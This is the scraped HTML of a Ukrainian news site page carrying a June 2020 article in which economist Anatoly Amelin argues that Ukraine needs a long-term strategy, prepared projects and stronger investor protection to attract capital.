реставратор изуродовал знаменитный шедевр (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809648"> <span class="postDate">18:25</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/2306-v-ukraine-nuzhno-privatizirovat-99-kompanij-amelin">В Украине нужно приватизировать 99% компаний, - Амелин</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809658"> <span class="postDate">18:15</span> <a class="postTitle" href="https://enovosty.com/news-finance/full/2306-ukrainskie-banki-uvelichili-chistuyu-pribyl-na-chetvert">Украинские банки значительно увеличили чистую прибыль</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809654"> <span class="postDate">17:50</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2306-pravitelstvo-prodolzhaet-aktivno-reformirovat-gosudarstvennye-predpriyatiya">Правительство продолжает активно реформировать государственные предприятия</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809644"> <span class="postDate">17:38</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2306-missiya-obse-zafiksirovala-bolee-30-tankov-naemnikov-rf-na-donbasse-sckk">Миссия ОБСЕ зафиксировала более 30 танков наемников РФ на Донбассе, - СЦКК</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809641"> <span class="postDate">17:24</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/2306-svobodnaya-ekonomicheskaya-zona-instrument-privlecheniya-investicij-i-sozdaniya-rabochix-mest-ekspert">Свободная экономическая зона - инструмент привлечения инвестиций и создания рабочих мест, - эксперт</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809640"> <span class="postDate">17:12</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2306-es-dolzhen-sosredotochitsya-na-vosstanovlenii-ekonomiki-posle-pandemii-merkel">ЕС должен сосредоточиться на восстановлении экономики после пандемии, - Меркель</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809635"> <span class="postDate">16:23</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2306-giperzvukovoe-oruzhie-i-iskusstvennyj-intellekt-nachinaetsya-novaya-globalnaya-gonka-vooruzhenij-smi">Гиперзвуковое оружие и искусственный интеллект: Начинается новая глобальная гонка вооружений, - СМИ</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809636"> <span class="postDate">16:21</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2306-v-nbu-soobshhili-o-merax-predprinimaemyx-dlya-borby-s-krizisom">В НБУ сообщили о мерах, предпринимаемых для борьбы с кризисом</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809631"> <span class="postDate">15:58</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2306-predpriyatiya-vpk-rf-prodolzhayut-tonut-v-dolgax-i-ubytkax-zloj-odessit">Предприятия ВПК РФ продолжают тонуть в долгах и убытках, - Злой Одессит</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809632"> <span class="postDate">15:51</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2306-shramy-ot-covid-19-mogut-ostatsya-na-vsyu-zhizn-uchenye-sdelali-vazhnoe-preduprezhdenie">Шрамы от Covid-19 могут остаться на всю жизнь: Ученые сделали важное предупреждение</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809630"> <span class="postDate">15:42</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2306-lukashenko-edet-v-moskvu-ne-na-parad-smotret-s-peremiriem-ili-ultimatumom-v-karmane-zloj-odessit">Лукашенко едет в Москву не на парад смотреть: с перемирием или ультиматумом в кармане, - "Злой одессит"</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809624"> <span class="postDate">15:36</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2306-tam-byla-voda-opublikovany-foto-eko-katastrofy-v-anneksirovannom-krymu-foto">"Там была вода": опубликованы фото эко-катастрофы в аннексированном Крыму (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809623"> <span class="postDate">15:03</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2306-totalnyj-karantin-mozhet-vyzvat-katastroficheskie-posledstviya-shmygal">Тотальный карантин может вызвать катастрофические последствия, - Шмыгаль</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809565"> <span class="postDate">15:00</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/2306-minoborony-yaponii-zaseklo-kitajskij-samolet-razvedchik-nad-yaponskim-morem">Минобороны Японии засекло китайский самолет-разведчик над Японским морем</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809608"> <span class="postDate">14:40</span> <a class="postTitle" href="https://enovosty.com/news_kiev/full/2306-nastoyashhee-korolevstvo-cvetov-na-stolichnom-podole-zacveli-sotni-butonov-roz-foto">Настоящее королевство цветов: на столичном Подоле зацвели сотни бутонов роз (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809613"> <span class="postDate">14:20</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2306-v-seti-poyavilis-trogatelnye-kadry-kak-ilon-mask-razgovarivaet-so-svoim-malenkim-synom-video">В Сети появились трогательные кадры, как Илон Маск разговаривает со своим маленьким сыном (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/">Все новости &raquo;</a></div><div class="links_bal"></div>  </div><div style="width:474px; border:none;" id="center"><div style="width:474px;overflow: visible;" class="wiget simple_category"><style type="text/css" media="screen">@import url(https://enovosty.com/wp-content/themes/eizvestia/css/singlePage.min.css?v=1);</style><style>#center .wiget.singlePost .plot{float:right;margin:5px 0 5px 10px;width:250px}</style><div class="wiget simple singlePost" style="float: left; overflow: hidden; height:auto; border:none; padding:0; margin-bottom:10px;" > <div itemscope itemtype="https://schema.org/NewsArticle" class="post _ga1_on_" style="margin:0; padding:0; " id="post-4809741"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://enovosty.com/news_economy/full/2406-ekspert-rasskazal-o-moshhnoj-zashhite-dlya-investorov-v-ukraine"/><article style="font-size:12pt;"><h1 itemprop="headline" id="postTitle">Эксперт рассказал о мощной защите для инвесторов в Украине</h1><div class="breadcrumb"><a href="https://enovosty.com/">Главная</a> <span>&raquo;</span> <a href="https://enovosty.com/news/">Последние новости</a> <span>&raquo;</span> <a href="https://enovosty.com/news/news_economy">Новости экономики</a> <span>&raquo;</span> Эксперт рассказал о мощной защите для инвесторов в Украине</div><time datetime="2020-06-24T08:54:34+03:00"><span id="date">Новости экономики, 08:54:34 </span></time><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F2406-ekspert-rasskazal-o-moshhnoj-zashhite-dlya-investorov-v-ukraine" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F2406-ekspert-rasskazal-o-moshhnoj-zashhite-dlya-investorov-v-ukraine"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%AD%D0%BA%D1%81%D0%BF%D0%B5%D1%80%D1%82+%D1%80%D0%B0%D1%81%D1%81%D0%BA%D0%B0%D0%B7%D0%B0%D0%BB+%D0%BE+%D0%BC%D0%BE%D1%89%D0%BD%D0%BE%D0%B9+%D0%B7%D0%B0%D1%89%D0%B8%D1%82%D0%B5+%D0%B4%D0%BB%D1%8F+%D0%B8%D0%BD%D0%B2%D0%B5%D1%81%D1%82%D0%BE%D1%80%D0%BE%D0%B2+%D0%B2+%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D0%B5&url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F2406-ekspert-rasskazal-o-moshhnoj-zashhite-dlya-investorov-v-ukraine&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%AD%D0%BA%D1%81%D0%BF%D0%B5%D1%80%D1%82+%D1%80%D0%B0%D1%81%D1%81%D0%BA%D0%B0%D0%B7%D0%B0%D0%BB+%D0%BE+%D0%BC%D0%BE%D1%89%D0%BD%D0%BE%D0%B9+%D0%B7%D0%B0%D1%89%D0%B8%D1%82%D0%B5+%D0%B4%D0%BB%D1%8F+%D0%B8%D0%BD%D0%B2%D0%B5%D1%81%D1%82%D0%BE%D1%80%D0%BE%D0%B2+%D0%B2+%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D0%B5&url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F2406-ekspert-rasskazal-o-moshhnoj-zashhite-dlya-investorov-v-ukraine&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F2406-ekspert-rasskazal-o-moshhnoj-zashhite-dlya-investorov-v-ukraine" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F2406-ekspert-rasskazal-o-moshhnoj-zashhite-dlya-investorov-v-ukraine"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail"> <a href="https://enovosty.com/print?printajax=4809741" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><p><b>Украине для привлечений инвестиций нужно начинать нужно со стратегии, с понимания ключевых целей, которые страна планирует достичь в следующие десять лет. </b></p><p>Такое мнение выразил сооснователь и директор экономических программ Ukrainian Institute for the Future <a class="tag" href="https://enovosty.com/tag/anatolij-amelin" target="_blank">Анатолий Амелин</a>. Он считает, что Украина может побороться за инвестора с другими странами, но начинать нужно со стратегии: , информирует <a class="inform" href="https://enovosty.com/news">enovosty.com/news</a>.</p><p>&#171;У Украины есть понимание того, сколько именно нужно денег, но сложность заключается в отсутствии экономической стратегии. Инвестор приходит и просит показать проект, под который ищутся <a class="tag" href="https://enovosty.com/tag/investicii" target="_blank">инвестиции</a>, но правительству трудно самому его подготовить. У нас есть заявления, у нас есть идеи, но у нас нет подготовленных упакованных проектов, таких, которые есть у других стран. Потому сейчас трудно говорить о том, как Украина сегодня может конкурентно победить. Если есть такая задача, то начинать нужно со стратегии, с понимания ключевых целей, которые Украина планирует достичь в следующие десять лет. Далее в рамках этих целей нужно упаковывать проект, то есть подготавливать его, описывать предварительное технико-экономическое обоснование, технико-экономическое обоснование и с ними уже начинать конкурировать. Страны выбирают юрисдикции по соотношению риска и доходности. Мы не показываем достаточную доходность, потому что не упакованы проекты и, во вторых, у нас очень высокие риски, в первую очередь в <a class="tag" href="https://enovosty.com/tag/sud" target="_blank">суд</a>ебной правовой системе&#187;, &#8212; рассуждает эксперт. </p><p>Анатолий Амелин уверен в том, что Украине сейчас нужно ставить на защиту инвесторов, и в данном случае у нас уже есть несколько проектов, которые активно обсуждаются. Это, в том числе, международный финансовый центр «Киев-Сити», в котором будет действовать британский суд. Эксперт полагает, что это станет мощной защитой для инвесторов, снижающей риски, а подготовленные упакованные проекты в рамках долгосрочной экономической стратегии, могут как раз создать условия для того, чтобы Украина победила в конкуренции за капитал. Более подробно о том, как Украине нужно строить стратегию и воевать за инвестиции, можете читать в полном интервью с Анатолием Амелиным <a href="https://enovosty.com/ekonomika/full/2306-anatolij-amelin-ekonomicheskaya-model-yuzhnoj-korei-optimalnyj-put-dlya-ukrainy?preview_id=4809629&#038;preview_nonce=d3e25c11cf&#038;_thumbnail_id=4809633&#038;preview=true" target="_blank" rel="nofollow noopener noreferrer">здесь</a>. </p><div class="tptn_counter" style="color:white;" id="tptn_counter_4809741"><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-counter.js.php?top_ten_id=4809741&amp;_wpnonce=6bffd27207"></script></div><div class="swp-content-locator"></div><br /><span itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" style="display:none;" src="https://enovosty.com/wp-content/themes/eizvestia/img/enovosty_logo.png"/> <meta itemprop="width" content="512"> <meta itemprop="height" content="512"></div><meta itemprop="name" content="Экономические новости" /><meta itemprop="telephone" content="+380958836229"><meta itemprop="address" content="Киев"></span><span itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Оксана Ельченко" /></span><meta itemprop="datePublished" content="2020-06-24T08:54:34+03:00"/><meta itemprop="dateModified" content="2020-06-24T08:54:34+03:00"/><meta itemprop="genre" content="Новости экономики"/><meta itemprop="description" content="Украине для привлечений инвестиций нужно начинать нужно со стратегии, с понимания ключевых целей, которые страна планирует достичь в следующие десять лет. "/><div itemprop="image" itemscope itemtype="https://schema.org/ImageObject" rel="nofollow"><span itemprop="url" itemprop="image" content="https://enovosty.com/wp-content/themes/eizvestia/img/enovosty_logo.png"><span itemprop="image" content="https://enovosty.com/wp-content/themes/eizvestia/img/enovosty_logo.png"><meta itemprop="width" content="512" /><meta itemprop="height" content="512" /> </span></span></div></article></div> <div class="postFooter" style="padding:0;"><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" target="_blank"><img alt="Экономические новости youtube" src="https://enovosty.com/wp-content/themes/eizvestia/img/youtube.jpg"></a><span id="authorName" style="margin-right: 25px;float: left;"><span id="label">Автор: Оксана Ельченко</span></span><div id="posttags" style="max-width: 360px;float: left;margin:10px 0 10px 7px; clear: both;">ТЕГИ: <a href="https://enovosty.com/tag/anatolij-amelin" rel="tag">Анатолий Амелин</a>, <a href="https://enovosty.com/tag/investicii" rel="tag">инвестиции</a>, <a href="https://enovosty.com/tag/sud" rel="tag">суд</a></div><div style="font: 11px/16px Arial,Verdana,sans-serif;float: right;">Посещений: 200</div><div class="voteBox" > </div><br /><p style="color:#a3a3a3;font-size:12px;clear:both;">Если Вы заметили орфографическую ошибку, выделите её мышью и нажмите Ctrl+Enter</p><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F2406-ekspert-rasskazal-o-moshhnoj-zashhite-dlya-investorov-v-ukraine" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F2406-ekspert-rasskazal-o-moshhnoj-zashhite-dlya-investorov-v-ukraine"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%AD%D0%BA%D1%81%D0%BF%D0%B5%D1%80%D1%82+%D1%80%D0%B0%D1%81%D1%81%D0%BA%D0%B0%D0%B7%D0%B0%D0%BB+%D0%BE+%D0%BC%D0%BE%D1%89%D0%BD%D0%BE%D0%B9+%D0%B7%D0%B0%D1%89%D0%B8%D1%82%D0%B5+%D0%B4%D0%BB%D1%8F+%D0%B8%D0%BD%D0%B2%D0%B5%D1%81%D1%82%D0%BE%D1%80%D0%BE%D0%B2+%D0%B2+%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D0%B5&url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F2406-ekspert-rasskazal-o-moshhnoj-zashhite-dlya-investorov-v-ukraine&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%AD%D0%BA%D1%81%D0%BF%D0%B5%D1%80%D1%82+%D1%80%D0%B0%D1%81%D1%81%D0%BA%D0%B0%D0%B7%D0%B0%D0%BB+%D0%BE+%D0%BC%D0%BE%D1%89%D0%BD%D0%BE%D0%B9+%D0%B7%D0%B0%D1%89%D0%B8%D1%82%D0%B5+%D0%B4%D0%BB%D1%8F+%D0%B8%D0%BD%D0%B2%D0%B5%D1%81%D1%82%D0%BE%D1%80%D0%BE%D0%B2+%D0%B2+%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D0%B5&url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F2406-ekspert-rasskazal-o-moshhnoj-zashhite-dlya-investorov-v-ukraine&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F2406-ekspert-rasskazal-o-moshhnoj-zashhite-dlya-investorov-v-ukraine" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F2406-ekspert-rasskazal-o-moshhnoj-zashhite-dlya-investorov-v-ukraine"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail" style="float: right; width: 54px; margin-top: 8px;"> <a href="https://enovosty.com/print?printajax=4809741" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><link rel="stylesheet" type="text/css" media="screen" href="https://enovosty.com/wp-content/plugins/ajax-login/login.css?v=2" /><div id="popup-login"><div class="login"><div class="caption"><span class="title">Вход на сайт</span><a class="link-close" href="#"><span class="close">Закрыть</span></a></div><form name="loginform" id="loginform" action="#" method="post"><p class="error"></p><p class="message"></p><img id="al_loadingImage" alt="Загрузка..." src="https://enovosty.com/wp-content/plugins/ajax-login/al_loading.gif"/><p><label for="user_login">Логин (email):</label><input type="text" name="user_login" id="user_login" class="input" value="" size="20" /></p><p><label for="user_pass">Пароль:</label><input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></p><div class="login-footer"><p class="forgetmenot"><input name="rememberme" type="checkbox" id="rememberme" value="forever" /><label for="rememberme">Запомнить меня</label></p><p class="submit"><input type="button" onClick="sendLogin('https://enovosty.com/wp-content/plugins/ajax-login/login.php', jQuery('#loginform').serialize());return false;" name="wp-submit" id="wp-submit" value="Войти" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="/register" id="wp-register">Зарегистрироваться</a></p></div><fieldset><legend>или</legend><div class="soclogin"> </div></fieldset></form></div></div><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/ajax-login/ajaxlogin.js"></script><input style="width: auto;float: none;background: #2196F3;margin: 5px 0;padding: 0 10px;font-size: 12px;" type="button" value="Вход/Регистрация" id="addanons" name="wp-submit" onclick="get_auth()" ><style type="text/css" media="screen">@import url(/wp-content/plugins/ajax-comment-loading/css/style.css?v=8);</style><noscript>Для загрузки комментариев нужен JavaScript.</noscript><div id="comments-loading" style="display:none">Комментарии...</div><div id="comments-loaded"></div><input type="hidden" name="comments_nonce" value="0a510e1c60" id="comments_nonce" /><script type="text/javascript">document.getElementById('comments-loading').style.display = 'block';</script></div>  </div><br /><div id='div-gpt-ad-1531223757969-0' style='height:600px; width:300px;'><script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1531223757969-0'); });</script></div><br> <div class="mainPageWiget articles" style="overflow:visible;"><p style="height: auto;overflow: visible; font-weight: 700;font-family: arial,verdana,tahoma;margin: 0;"><a style="color:#000;font-size: 16px;" href="https://enovosty.com/articles">Аналитика</a></p><hr style="border: 1px solid #000000;"><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4809629"><div class="blockTitle"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/ei_size.gif" /><a class="postTitle" href="https://enovosty.com/ekonomika/full/2306-anatolij-amelin-ekonomicheskaya-model-yuzhnoj-korei-optimalnyj-put-dlya-ukrainy">Анатолий Амелин: Экономическая модель Южной Кореи – оптимальный путь для Украины</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4809586"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/2306-amerika-rossii-podarit-paroxod-shtaty-opyat-pugayut-putina">Америка России "подарит пароход"? Штаты опять пугают Путина "адскими" санкциями...</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4809389"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/ekonomika/full/2006-sergej-fursa-ukrainskaya-vlast-gotovitsya-kinut-mvf-i-privesti-stranu-k-defoltu">Сергей Фурса: Украинская власть готовится «кинуть» МВФ и привести страну к дефолту</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4808893"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1606-bykov-vs-saakyan-koronavirus-politicheskie-skandaly-i-budushhie-mestnye-vybory-v-ukraine">Быков vs Саакян: Коронавирус, политические скандалы и будущие местные выборы в Украине</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4808820"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/auto/full/1606-kakie-avtomobili-potreblyayut-menshe-goryuchego-obzor-rynka">Какие автомобили потребляют меньше топлива: Обзор рынка</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4808731"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1506-anatomiya-amerikanskoj-destruktivnosti-ili-lyumpen-proletarskij-bunt-v-shtatax-bessmyslennyj-i-besposhhadnyj">Анатомия американской деструктивности, или Люмпен-пролетарский бунт в Штатах, бессмысленный и беспощадный</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4808417"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/ekonomika/full/1206-andrej-dligach-obratilsya-k-zelenskomu-esli-zavoevat-afriku-segodnya-zavtra-uroven-zhizni-v-ukraine-budet-kak-v-polshe">Андрей Длигач обратился к Зеленскому: Если завоевать Африку сегодня, завтра уровень жизни в Украине будет как в Польше</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4808407"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/ekonomika/full/1206-rynok-energetiki-pri-izbytke-v-strane-aes-ukraine-ne-imeet-smysla-sejchas-aktivno-zanimatsya-alternativnymi-istochnikami-energii-ilya-ponomarev">Рынок энергетики: «При избытке в стране АЭС Украине не имеет смысла активно заниматься альтернативными источниками энергии», - Илья Пономарев (Часть 2)</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4808276"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/ekonomika/full/1106-rynok-gaza-v-ukraine-i-mire-pyat-krupnejshix-gazodobytchikov-v-strane-naxodyatsya-v-rukax-oligarxov-ilya-ponomarev-chast-1">Рынок газа в Украине и мире: «Пять крупнейших газодобытчиков в стране находятся в руках олигархов», - Илья Пономарев (Часть 1)</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4807765"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/506-ssha-s-kitaem-stolknutsya-lbami-v-ozhidanii-globalnoj-vojny">США с Китаем столкнутся лбами? В ожидании глобальной войны</a></div><div class="more"><a href="https://enovosty.com/articles">Все статьи</a></div></div></div><script async src="//wajzfx.com/m4n17l291/lvimp00y38qh867qvu867kpyy8.php"></script><div data-la-block="19294618-a8e7-4e40-9d78-3f68f63c6570"></div><br /><div
id='admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069'></div><script type='text/javascript'>admixerML.fn.push(function() {admixerML.display('admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069');});</script><div id="pop_video" class="six"><p class="head"><span>популярные видео</span></p><div class="caption" data-limit="6"> <div class="caption_link"><a href="javascript:void(0)" class="active" onclick="getbVideo(0)">читаемые</a>&nbsp;&nbsp;<a href="javascript:void(0)" data-rb="1" onclick="getbVideo(1)">комментируемые</a></div><div class="popular-sort"><div class="sort"><a onclick="getPopVideo(31)">месяц</a></div><div class="sort"><a class="active" onclick="getPopVideo(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">за&#160;&#160;<a onclick="getPopVideo(1)">сутки</a>&nbsp;&nbsp;|</div></div></div> <table style="width:100%;" class="newsbody"><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_society/full/1706-koty-eto-zhidkost-polzovatelej-seti-umilil-kotenok-kotoryj-usnul-v-neobychnoj-poze-video"><img width="142" height="88" alt="Без кота и жизнь не та: пользователей Сети умилил котенок, который уснул в необычной позе" src="https://enovosty.com/wp-content/uploads/2020/06/img_top-2-11-e1592414191147.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_society/full/1706-koty-eto-zhidkost-polzovatelej-seti-umilil-kotenok-kotoryj-usnul-v-neobychnoj-poze-video">Без кота и жизнь не та: пользователей Сети умилил котенок, который уснул в необычной позе</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_incidents/full/2206-vzryv-v-zhilom-dome-v-kieve-prichina-tragedii-skolko-postradavshix-i-chto-budet-s-ostalnymi"><img width="142" height="88" alt="Взрыв в жилом доме в Киеве: причина трагедии, сколько пострадавших и что будет с остальными?" src="https://enovosty.com/wp-content/uploads/2020/06/d45dd9bfb998bbcc6bbab5aac5cc12a1d16c098a-e1592770321394.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_incidents/full/2206-vzryv-v-zhilom-dome-v-kieve-prichina-tragedii-skolko-postradavshix-i-chto-budet-s-ostalnymi">Взрыв в жилом доме в Киеве: причина трагедии, сколько пострадавших и что будет с остальными?</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news_society/full/1806-v-kieve-progremeli-vzryvy-na-podstancii-chast-goroda-obestochena-video"><img width="142" height="88" alt="В Киеве прогремели взрывы на подстанции: часть города обесточена" src="https://enovosty.com/wp-content/uploads/2020/06/6bf9a2c3267696da171841e8fbd627df.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_society/full/1806-v-kieve-progremeli-vzryvy-na-podstancii-chast-goroda-obestochena-video">В Киеве прогремели взрывы на подстанции: часть города обесточена</a></div></td></tr><tr><td class="view"><span><i></i>5477</span></td><td class="view"><span><i></i>3032</span></td><td class="view last"><span><i></i>2120</span></td></tr><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_society/full/2206-opublikovano-pechalnoe-video-ekokatastrofy-v-anneksirovannom-krymu-video"><img width="142" height="88" alt="Опубликовано печальное видео экокатастрофы в аннексированном Крыму" src="https://enovosty.com/wp-content/uploads/2020/06/2020-06-22.png" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_society/full/2206-opublikovano-pechalnoe-video-ekokatastrofy-v-anneksirovannom-krymu-video">Опубликовано печальное видео экокатастрофы в аннексированном Крыму</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_incidents/full/1706-tragediya-v-odesse-v-gorode-na-gipermarket-ruxnul-samolet"><img width="142" height="88" 